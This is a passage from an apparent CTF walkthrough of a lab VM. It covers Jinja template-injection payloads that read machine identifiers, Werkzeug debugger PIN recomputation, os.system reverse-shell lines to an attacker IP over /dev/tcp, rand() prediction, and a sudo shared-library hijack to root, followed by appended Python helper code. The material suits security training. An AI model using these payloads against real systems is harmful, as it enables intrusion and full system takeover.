base with Python:<\/p>\n<pre><code class=\"language-python\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3                 \nPython 3.11.8 (main, Feb  7 2024, 21:52:08) [GCC 13.2.0] on linux\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; print(0x08002725b46c)   # remove the colons and prefix the hex digits with 0x\n8796749804652<\/code><\/pre>\n<h4>Machine ID<\/h4>\n<p>Normally it can be obtained with this script:<\/p>\n<pre><code class=\"language-python\">machine_id = b&quot;&quot;\nfor filename in &quot;\/etc\/machine-id&quot;, &quot;\/proc\/sys\/kernel\/random\/boot_id&quot;:\n    try:\n        with open(filename, &quot;rb&quot;) as f:\n            value = f.readline().strip()\n    except 
OSError:\n        continue\n\n    if value:\n        machine_id += value\n        break\ntry:\n    with open(&quot;\/proc\/self\/cgroup&quot;, &quot;rb&quot;) as f:\n        machine_id += f.readline().strip().rpartition(b&quot;\/&quot;)[2]\nexcept OSError:\n    pass\n\nprint(machine_id)<\/code><\/pre>\n<p>But here we only have the file upload, so build payloads that read the files instead:<\/p>\n<pre><code class=\"language-python\">{{ get_flashed_messages.__globals__.__builtins__.open(&quot;\/etc\/machine-id&quot;).read() }}\n# &lt;html&gt; &lt;head&gt; HelloWorld! &lt;\/head&gt; &lt;body&gt; 48329e233f524ec291cce7479927890b &lt;\/body&gt; &lt;\/html&gt;\n{{ get_flashed_messages.__globals__.__builtins__.open(&quot;\/proc\/sys\/kernel\/random\/boot_id&quot;).read() }}\n# &lt;html&gt; &lt;head&gt; HelloWorld! &lt;\/head&gt; &lt;body&gt; 3f935d08-760e-4f78-aa51-e59eac98390a &lt;\/body&gt; &lt;\/html&gt;\n{{ get_flashed_messages.__globals__.__builtins__.open(&quot;\/proc\/self\/cgroup&quot;).read() }}\n# &lt;html&gt; &lt;head&gt; HelloWorld! 
&lt;\/head&gt; &lt;body&gt; 0::\/system.slice\/zeug-app.service &lt;\/body&gt; &lt;\/html&gt;<\/code><\/pre>\n<p>Write the three values into local files, point the script at them, and run it (<code>echo<\/code> adds a trailing newline, but <code>strip()<\/code> removes it again):<\/p>\n<pre><code class=\"language-python\">machine_id = b&quot;&quot;\nfor filename in &quot;machine-id&quot;, &quot;boot_id&quot;:\n    try:\n        with open(filename, &quot;rb&quot;) as f:\n            value = f.readline().strip()\n    except OSError:\n        continue\n\n    if value:\n        machine_id += value\n        break\ntry:\n    with open(&quot;cgroup&quot;, &quot;rb&quot;) as f:\n        machine_id += f.readline().strip().rpartition(b&quot;\/&quot;)[2]\nexcept OSError:\n    pass\n\nprint(machine_id)<\/code><\/pre>\n<p>Result:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ echo &quot;48329e233f524ec291cce7479927890b&quot; &gt; machine-id\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ echo &quot;3f935d08-760e-4f78-aa51-e59eac98390a&quot; &gt; boot_id\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ echo &quot;0::\/system.slice\/zeug-app.service&quot; &gt; cgroup    \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ vim mi.py    \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ chmod +x mi.py  \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 mi.py           \nb&#039;48329e233f524ec291cce7479927890bzeug-app.service&#039;<\/code><\/pre>\n<h4>Updating the full script<\/h4>\n<p>Put the public bits (username, <code>flask.app<\/code>, <code>Flask<\/code>, the <code>app.py<\/code> path) and the private bits (decimal MAC, machine id) into the PIN script:<\/p>\n<pre><code class=\"language-python\"># get_pin.py\nimport hashlib\nfrom itertools import chain\n\nprobably_public_bits = [\n    &#039;cosette&#039;,\n    &#039;flask.app&#039;,\n    &#039;Flask&#039;,\n    
&#039;\/home\/cosette\/zeug\/venv\/lib\/python3.11\/site-packages\/flask\/app.py&#039;\n]\n\nprivate_bits = [\n    &#039;8796749804652&#039;,\n    &#039;48329e233f524ec291cce7479927890bzeug-app.service&#039;\n]\n\nh = hashlib.sha1()  # Werkzeug &gt;= 2.0; older releases used hashlib.md5()\nfor bit in chain(probably_public_bits, private_bits):\n    if not bit:\n        continue\n    if isinstance(bit, str):\n        bit = bit.encode(&#039;utf-8&#039;)\n    h.update(bit)\nh.update(b&#039;cookiesalt&#039;)\n#h.update(b&#039;shittysalt&#039;)\n\ncookie_name = &#039;__wzd&#039; + h.hexdigest()[:20]\n\nnum = None\nif num is None:\n    h.update(b&#039;pinsalt&#039;)\n    num = (&#039;%09d&#039; % int(h.hexdigest(), 16))[:9]\n\nrv = None\nif rv is None:\n    for group_size in 5, 4, 3:\n        if len(num) % group_size == 0:\n            rv = &#039;-&#039;.join(num[x:x + group_size].rjust(group_size, &#039;0&#039;)\n                          for x in range(0, len(num), group_size))\n            break\n    else:\n        rv = num\n\nprint(rv)<\/code><\/pre>\n<p>Run it to get the PIN:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ vim get-pin.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ chmod +x get-pin.py \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 get-pin.py \n367-506-961<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826210.png\" alt=\"image-20240328165626788\" \/><\/p>\n<p>Not sure where it went wrong... I deleted the machine, re-imported it and regenerated the MAC addresses of all its network adapters.<\/p>\n<p>The PIN is only as good as its inputs: the MAC has to be the one <code>uuid.getnode()<\/code> returns inside the target and the cgroup entry the one of the running Flask process; any mismatch silently yields a different nine digits, and after too many wrong attempts Werkzeug locks the console until the server is restarted, so verify each value before trying it.<\/p>\n<p>Trying again:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826211.png\" alt=\"image-20240328172650120\" \/><\/p>\n<p>Success!<\/p>\n<h3>Console RCE<\/h3>\n<p>With the console unlocked, any Python expression runs inside the Flask process. <code>os.system()<\/code> passes its string to <code>\/bin\/sh<\/code>, and where that is dash (the Debian default) the <code>\/dev\/tcp<\/code> redirection does not exist, which is why the last line wraps the reverse shell in <code>bash -c<\/code>:<\/p>\n<pre><code class=\"language-python\">__import__(&#039;os&#039;).popen(&#039;whoami&#039;).read();\n__import__(&#039;os&#039;).system(&quot;bash -i &gt;&amp; \/dev\/tcp\/172.20.10.8\/1234 0&gt;&amp;1&quot;)\n__import__(&#039;os&#039;).system(&#039;bash -c &quot;bash -i &gt;&amp; \/dev\/tcp\/172.20.10.8\/1234 0&gt;&amp;1&quot;&#039;)<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826212.png\" alt=\"image-20240328173404084\" \/><\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Enumeration<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826214.png\" alt=\"image-20240328174036683\" \/><\/p>\n<h3>Inspecting seed_bak<\/h3>\n<pre><code class=\"language-bash\">file seed_bak     \nseed_bak: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=403ea35a235b0a4c74f7977580b4ef46fcd0f044, for GNU\/Linux 4.4.0, not stripped<\/code><\/pre>\n<p>Load it into <code>ida<\/code> and look at <code>main<\/code>:<\/p>\n<pre><code class=\"language-c\">\/\/ main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  int v4; \/\/ [rsp+Ch] [rbp-14h]\n  int v5; \/\/ [rsp+10h] [rbp-10h]\n  int v6; \/\/ [rsp+14h] 
[rbp-Ch]\n  unsigned __int64 v7; \/\/ [rsp+18h] [rbp-8h]\n\n  v7 = __readfsqword(0x28u);\n  banner(*(_QWORD *)&amp;argc, argv, envp);\n  srand(1u);\n  v5 = rand();\n  v6 = -559038737;\n  v4 = 0;\n  printf(&quot;Enter a number: &quot;);\n  __isoc99_scanf(&quot;%d&quot;, &amp;v4);\n  if ( v6 == (v5 ^ v4) )\n    system(&quot;\/bin\/bash&quot;);\n  else\n    puts(&quot;Wrong.&quot;);\n  return 0;\n}<\/code><\/pre>\n<h3>Predictable random number + switching to the exia user<\/h3>\n<p>The &quot;secret&quot; is <code>rand() ^ v4<\/code> compared against <code>-559038737<\/code>, which is just <code>0xdeadbeef<\/code> as a signed 32-bit int, after a fixed <code>srand(1)<\/code>. Seed 1 is also the default seed of <code>rand()<\/code>, so the first value is identical on every run and on every machine with the same libc; a few lines of C linked against that libc recover the expected input:<\/p>\n<pre><code class=\"language-c\">#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n\nint main(void) {\n    srand(1u);                   \/* same fixed seed as seed_bak *\/\n    int v5 = rand();             \/* 1804289383 with glibc *\/\n    int v6 = -559038737;         \/* 0xdeadbeef *\/\n    printf(&quot;%d\\n&quot;, v5 ^ v6);    \/* the number the check expects *\/\n    return 0;\n}\n\/\/ -1255736440<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826215.png\" alt=\"image-20240328180730702\" \/><\/p>\n<h3>Second privilege escalation<\/h3>\n<h4>Enumeration<\/h4>\n<pre><code class=\"language-bash\">exia@zeug:\/home\/cosette$ cd \/home\/exia\nexia@zeug:~$ ls -la\ntotal 44\ndrwx------ 3 exia exia  4096 Jan  6 23:23 .\ndrwxr-xr-x 4 root root  4096 Jan  6 19:28 ..\nlrwxrwxrwx 1 exia exia     9 Jan  6 23:23 .bash_history -&gt; \/dev\/null\n-rwx------ 1 exia exia  
 220 Apr 23  2023 .bash_logout\n-rwx------ 1 exia exia  3526 Apr 23  2023 .bashrc\ndrwx------ 3 exia exia  4096 Jan  6 21:46 .local\n-rwx------ 1 exia exia   807 Apr 23  2023 .profile\n-rwx------ 1 exia exia 15744 Jan  6 21:59 seed\n-rwx------ 1 exia exia    38 Jan  6 22:14 user.txt\nexia@zeug:~$ cat user.txt\nHMYVM{exia_1XZ2GUy6gwSRwXwFUKEkZC6cT}\nexia@zeug:~$ sudo -l\nMatching Defaults entries for exia on zeug:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser exia may run the following commands on zeug:\n    (root) NOPASSWD: \/usr\/bin\/zeug<\/code><\/pre>\n<h4>Decompiling zeug<\/h4>\n<pre><code class=\"language-c\">\/\/ main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  if ( dlopen(&quot;\/home\/exia\/exia.so&quot;, 2) )   \/\/ 2 == RTLD_NOW\n    return 0;\n  fwrite(&quot;Error opening file\\n&quot;, 1uLL, 0x13uLL, _bss_start);   \/\/ _bss_start is stderr\n  return 1;\n}<\/code><\/pre>\n<p>All it does is <code>dlopen()<\/code> the shared library <code>\/home\/exia\/exia.so<\/code>, a path inside a directory exia owns, and sudo runs the binary as root without a password. The constructors of whatever library sits at that path therefore execute as root, so we can <a href=\"https:\/\/exploit-notes.hdks.org\/exploit\/linux\/privilege-escalation\/sudo\/sudo-privilege-escalation-by-overriding-shared-library\/\">hijack it<\/a>:<\/p>\n<pre><code class=\"language-c\">\/\/ exia.c\n#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;unistd.h&gt;\n\n\/* runs as soon as dlopen() maps the library, before any exported symbol is used *\/\nvoid inject(void) __attribute__((constructor));\n\nvoid inject(void) {\n    unsetenv(&quot;LD_PRELOAD&quot;);\n    setgid(0);   \/* sudo already gives real uid 0; set gid, then uid, explicitly for the child shell *\/\n    setuid(0);\n    system(&quot;\/bin\/bash&quot;);\n}<\/code><\/pre>\n<p>Then compile it as a shared library:<\/p>\n<pre><code class=\"language-bash\">gcc -fPIC -shared -o exia.so exia.c<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826216.png\" alt=\"image-20240328182210680\" \/><\/p>\n<p>Copy it to <code>\/home\/exia\/exia.so<\/code>, run the sudo command, and get root!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826217.png\" alt=\"image-20240328182504876\" \/><\/p>\n<h4>Finding the flag<\/h4>\n<pre><code class=\"language-text\">exia@zeug:~$ sudo \/usr\/bin\/zeug\nroot@zeug:\/home\/exia# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@zeug:\/home\/exia# cd \/root\nroot@zeug:~# ls -la\ntotal 32\ndrwx------  4 root root 4096 Jan  6 23:52 .\ndrwxr-xr-x 18 root root 4096 Jan  6 13:28 ..\nlrwxrwxrwx  1 root root    9 Jan  6 23:20 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc\n-rw-------  1 root root   20 Jan  6 22:40 .lesshst\ndrwxr-xr-x  3 root root 4096 Jan  6 13:52 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-------  1 root root    0 Jan  6 15:13 .python_history\n-rw-r--r--  1 root root   38 Jan  6 23:06 root.txt\ndrwx------  2 root root 4096 Jan  6 23:52 .ssh\nroot@zeug:~# cat root.txt \nHMYVM{root_Ut9RX5o7iZVKXjrOgcGW3fxBq}<\/code><\/pre>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/www.cnblogs.com\/bmjoker\/p\/13508538.html\">https:\/\/www.cnblogs.com\/bmjoker\/p\/13508538.html<\/a><\/p>\n<p><a href=\"https:\/\/moonsec.top\/articles\/108\">https:\/\/moonsec.top\/articles\/108<\/a><\/p>\n<p><a href=\"https:\/\/hackmanit.de\/en\/blog-en\/178-template-injection-vulnerabilities-understand-detect-identify\">https:\/\/hackmanit.de\/en\/blog-en\/178-template-injection-vulnerabilities-understand-detect-identify<\/a><\/p>\n<p><a href=\"https:\/\/wiki.wgpsec.org\/knowledge\/ctf\/SSTI.html\">https:\/\/wiki.wgpsec.org\/knowledge\/ctf\/SSTI.html<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>zeug When importing the target VM, regenerate the MAC addresses of all its network adapters. Information gathering Port scan nmap -sCV 10.0 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,22],"tags":[],"class_list":["post-471","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-reverse"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/471","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=471"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/471\/revisions"}],"predecessor-version":[{"id":476,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/471\/revisions\/476"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=471"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=471"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=471"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
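Added example (not part of the original write-up): the Werkzeug PIN derivation from the walkthrough above, packaged as functions so each leaked input can be checked on its own. The hashing mirrors `get_pin_and_cookie_name()` in `werkzeug.debug` (2.0 and later, SHA-1), the same steps as the `get_pin.py` script; the sample values are the ones the walkthrough read through the template, embedded here as constructed inputs, and the helper names (`mac_to_node`, `machine_id_from_values`, `werkzeug_pin`, `compute_zeug_pin`) are mine.

```python
"""Recompute a Werkzeug debugger PIN from values leaked out of the target.

Added example; the algorithm follows werkzeug.debug (>= 2.0, SHA-1) and the
get_pin.py script in the walkthrough.  Sample inputs are constructed from the
values the walkthrough leaked and are not re-read from any file.
"""
import hashlib
from itertools import chain
from typing import Optional, Tuple


def mac_to_node(mac: str) -> int:
    """'08:00:27:25:b4:6c' -> 8796749804652, the integer uuid.getnode() returns."""
    return int(mac.replace(":", "").replace("-", ""), 16)


def machine_id_from_values(machine_id: Optional[str],
                           boot_id: Optional[str],
                           cgroup_line: Optional[str]) -> bytes:
    """Rebuild werkzeug's Linux machine id from already-read file contents.

    Werkzeug takes the first non-empty of /etc/machine-id and
    /proc/sys/kernel/random/boot_id, then appends the last path component of
    the first line of /proc/self/cgroup.  Values are stripped, so the newline
    that `echo` leaves in a local copy does not matter.
    """
    result = b""
    for value in (machine_id, boot_id):
        if value is None:
            continue
        value = value.strip().encode()
        if value:
            result += value
            break
    if cgroup_line is not None:
        result += cgroup_line.strip().encode().rpartition(b"/")[2]
    return result


def werkzeug_pin(username: str, modname: str, appname: str, app_path: str,
                 node: int, machine_id: bytes) -> Tuple[str, str]:
    """Return (pin, cookie_name) the way werkzeug >= 2.0 derives them."""
    probably_public_bits = [username, modname, appname, app_path]
    private_bits = [str(node), machine_id]

    h = hashlib.sha1()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")
    # name of the cookie the browser keeps once a PIN has been accepted
    cookie_name = "__wzd" + h.hexdigest()[:20]

    h.update(b"pinsalt")
    num = ("%09d" % int(h.hexdigest(), 16))[:9]

    for group_size in (5, 4, 3):
        if len(num) % group_size == 0:
            pin = "-".join(num[x:x + group_size].rjust(group_size, "0")
                           for x in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name


# Constructed from the values leaked in the walkthrough.
SAMPLE = {
    "username": "cosette",
    "modname": "flask.app",
    "appname": "Flask",
    "app_path": "/home/cosette/zeug/venv/lib/python3.11/site-packages/flask/app.py",
    "mac": "08:00:27:25:b4:6c",
    "machine_id_file": "48329e233f524ec291cce7479927890b\n",
    "boot_id_file": "3f935d08-760e-4f78-aa51-e59eac98390a\n",
    "cgroup_line": "0::/system.slice/zeug-app.service\n",
}


def compute_zeug_pin(mac: str = SAMPLE["mac"]) -> Tuple[str, str]:
    """PIN and cookie name for the sample target; `mac` is the input that
    has to be re-read whenever the VM is re-imported."""
    machine_id = machine_id_from_values(SAMPLE["machine_id_file"],
                                        SAMPLE["boot_id_file"],
                                        SAMPLE["cgroup_line"])
    return werkzeug_pin(SAMPLE["username"], SAMPLE["modname"], SAMPLE["appname"],
                        SAMPLE["app_path"], mac_to_node(mac), machine_id)


def looks_like_pin(pin: str) -> bool:
    """Werkzeug PINs are nine digits grouped as ddd-ddd-ddd."""
    parts = pin.split("-")
    return len(parts) == 3 and all(len(p) == 3 and p.isdigit() for p in parts)


if __name__ == "__main__":
    pin, cookie = compute_zeug_pin()
    print("PIN:", pin, "cookie:", cookie)
```

Every file value is stripped before hashing, so the trailing newline `echo` leaves in the local copies does not change the result; a wrong MAC, on the other hand, silently changes every digit, which is why the MAC is the input to re-check first when a computed PIN is rejected.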
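Added example (not part of the original write-up): instead of compiling a helper against the same libc, the glibc `random()` generator that `rand()` uses (the default 31-word additive feedback generator) is re-implemented in Python so the value `seed_bak` expects can be computed anywhere, and the binary's comparison can be replayed on a candidate input. The constants (`srand(1)`, `0xdeadbeef`) come from the decompiled `main()` above; the function names are mine.

```python
"""Predict glibc rand() offline to answer seed_bak's check.

Added example; glibc's random() (the TYPE_3 additive feedback generator that
rand() uses) is re-implemented here so the value seed_bak expects can be
computed without compiling against the target's libc.  The constants come
from the decompiled main(): srand(1) and v6 == 0xdeadbeef.
"""
from typing import List

DEADBEEF = -559038737            # v6 in main(): 0xdeadbeef as a signed 32-bit int
MASK32 = 0xFFFFFFFF


def to_int32(x: int) -> int:
    """Reinterpret the low 32 bits of x as a C `int`."""
    x &= MASK32
    return x - (1 << 32) if x & 0x80000000 else x


def glibc_rand_sequence(seed: int, count: int) -> List[int]:
    """First `count` values rand() returns after srand(seed) on glibc.

    Mirrors __srandom_r/__random_r for the default 31-word state:
    r[0]   = seed (0 is treated as 1)
    r[i]   = 16807 * r[i-1] mod (2**31 - 1)       for 1 <= i < 31
    r[i]   = r[i-31]                               for 31 <= i < 34
    r[i]   = (r[i-31] + r[i-3]) mod 2**32          for i >= 34
    rand() output k is r[k + 344] >> 1 (the first 310 words are discarded).
    """
    seed &= MASK32
    if seed == 0:                      # glibc: "if (seed == 0) seed = 1;"
        seed = 1
    r = [seed]                         # state[0] = seed
    word = to_int32(seed)              # int32_t word = seed
    for _ in range(1, 31):
        # glibc computes 16807 * word mod (2**31 - 1) with Schrage's method;
        # C's '/' truncates toward zero, so emulate that explicitly.
        hi = abs(word) // 127773
        if word < 0:
            hi = -hi
        lo = word - hi * 127773
        word = 16807 * lo - 2836 * hi
        if word < 0:
            word += 2147483647
        r.append(word)
    for i in range(31, 34):            # the three "virtual" words r[31..33]
        r.append(r[i - 31])
    out = []
    for i in range(34, 344 + count):   # additive feedback; 310 words discarded
        r.append((r[i - 31] + r[i - 3]) & MASK32)
        if i >= 344:
            out.append(r[i] >> 1)      # rand() returns the word shifted right by one
    return out


def seed_bak_answer(seed: int = 1) -> int:
    """The number v4 for which `v6 == (rand() ^ v4)` holds in seed_bak."""
    first = glibc_rand_sequence(seed, 1)[0]
    return to_int32(first ^ (DEADBEEF & MASK32))


def seed_bak_accepts(v4: int, seed: int = 1) -> bool:
    """Replay the binary's comparison on a candidate input."""
    first = glibc_rand_sequence(seed, 1)[0]
    return to_int32(first ^ (v4 & MASK32)) == DEADBEEF


if __name__ == "__main__":
    print("rand() after srand(1):", glibc_rand_sequence(1, 3))
    print("answer for seed_bak:", seed_bak_answer())
```

`seed_bak_answer()` reproduces the `-1255736440` the C helper in the walkthrough printed; the same function answers any variant of the binary that swaps in another fixed seed, while a target built against a different libc (musl, BSD) would need that libc's generator instead.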